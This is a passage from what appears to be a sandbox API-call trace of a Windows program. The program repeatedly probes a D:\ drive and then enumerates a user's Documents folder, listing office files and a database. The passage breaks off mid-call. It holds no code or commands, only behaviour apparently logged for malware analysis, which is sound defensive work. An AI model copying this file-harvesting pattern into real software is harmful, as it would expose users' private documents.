lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0067.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0067.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0067.479] FindClose (in: hFindFile=0x9beb40 | out: hFindFile=0x9beb40) returned 1 [0067.480] FindClose (in: hFindFile=0x9bf440 | out: hFindFile=0x9bf440) returned 1 [0067.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0067.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0067.481] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.486] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.487] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.491] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.666] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.670] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.670] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.675] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.675] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.679] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.687] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.691] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.693] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.699] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.699] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.703] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.703] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.707] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.707] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.711] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.755] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.760] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.760] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.765] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.765] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.769] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.769] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.769] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.773] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.773] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.777] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.778] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.781] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.782] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.785] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.786] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.790] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.790] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0067.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.794] GetFileAttributesExW (in: lpFileName="D:\\" (normalized: "d:"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0067.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.794] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\", lpFilePart=0x0) returned 0x1a [0067.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a011695, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a011695, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0067.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.794] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\", lpFilePart=0x0) returned 0x1a [0067.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0067.794] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\", lpFilePart=0x0) returned 0x1a [0067.794] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*.txt", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.795] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a011695, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a011695, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bef00 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a011695, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a011695, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd02cd50, ftCreationTime.dwHighDateTime=0x1d596a9, ftLastAccessTime.dwLowDateTime=0x979171f0, ftLastAccessTime.dwHighDateTime=0x1d58707, ftLastWriteTime.dwLowDateTime=0x979171f0, ftLastWriteTime.dwHighDateTime=0x1d58707, nFileSizeHigh=0x0, nFileSizeLow=0x11490, dwReserved0=0x0, dwReserved1=0x0, cFileName="23iZdkXXLok6512uz.docx", cAlternateFileName="23IZDK~1.DOC")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165c4830, ftCreationTime.dwHighDateTime=0x1d5c226, ftLastAccessTime.dwLowDateTime=0xd2602fe0, ftLastAccessTime.dwHighDateTime=0x1d552f2, ftLastWriteTime.dwLowDateTime=0xd2602fe0, ftLastWriteTime.dwHighDateTime=0x1d552f2, nFileSizeHigh=0x0, nFileSizeLow=0x67d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="4pPJKhvtklZXxwQ0M09.docx", cAlternateFileName="4PPJKH~1.DOC")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2107f870, ftCreationTime.dwHighDateTime=0x1d5bce9, ftLastAccessTime.dwLowDateTime=0x73686bb0, ftLastAccessTime.dwHighDateTime=0x1d5d46b, ftLastWriteTime.dwLowDateTime=0x73686bb0, ftLastWriteTime.dwHighDateTime=0x1d5d46b, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ax_c.pptx", cAlternateFileName="AX_C~1.PPT")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28aaa940, ftCreationTime.dwHighDateTime=0x1d586ea, ftLastAccessTime.dwLowDateTime=0x996d7d10, ftLastAccessTime.dwHighDateTime=0x1d563a9, ftLastWriteTime.dwLowDateTime=0x996d7d10, ftLastWriteTime.dwHighDateTime=0x1d563a9, nFileSizeHigh=0x0, nFileSizeLow=0x285b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cyaer-G0v.pptx", cAlternateFileName="CYAER-~1.PPT")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979fde90, ftCreationTime.dwHighDateTime=0x1d56be4, ftLastAccessTime.dwLowDateTime=0xedc4b1a0, ftLastAccessTime.dwHighDateTime=0x1d5ac8b, ftLastWriteTime.dwLowDateTime=0xedc4b1a0, ftLastWriteTime.dwHighDateTime=0x1d5ac8b, nFileSizeHigh=0x0, nFileSizeLow=0x96f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="faIAqUgP BwWKbX.docx", cAlternateFileName="FAIAQU~1.DOC")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf7bf00, ftCreationTime.dwHighDateTime=0x1d5b5f4, ftLastAccessTime.dwLowDateTime=0x393cd1c0, ftLastAccessTime.dwHighDateTime=0x1d59f68, ftLastWriteTime.dwLowDateTime=0x393cd1c0, ftLastWriteTime.dwHighDateTime=0x1d59f68, nFileSizeHigh=0x0, nFileSizeLow=0x8ed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="iN034yd-ltTggQ-HcC.xlsx", cAlternateFileName="IN034Y~1.XLS")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d875f0, ftCreationTime.dwHighDateTime=0x1d5541d, ftLastAccessTime.dwLowDateTime=0x2e8b89d0, ftLastAccessTime.dwHighDateTime=0x1d54bdd, ftLastWriteTime.dwLowDateTime=0x2e8b89d0, ftLastWriteTime.dwHighDateTime=0x1d54bdd, nFileSizeHigh=0x0, nFileSizeLow=0x1688a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lmvGT20EAt7X97ts9.pptx", cAlternateFileName="LMVGT2~1.PPT")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mpp4LjR5L7", cAlternateFileName="MPP4LJ~1")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0067.795] FindNextFileW (in: hFindFile=0x9bef00, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0067.796] FindNextFileW (in: hFindFile=0x9bef00, 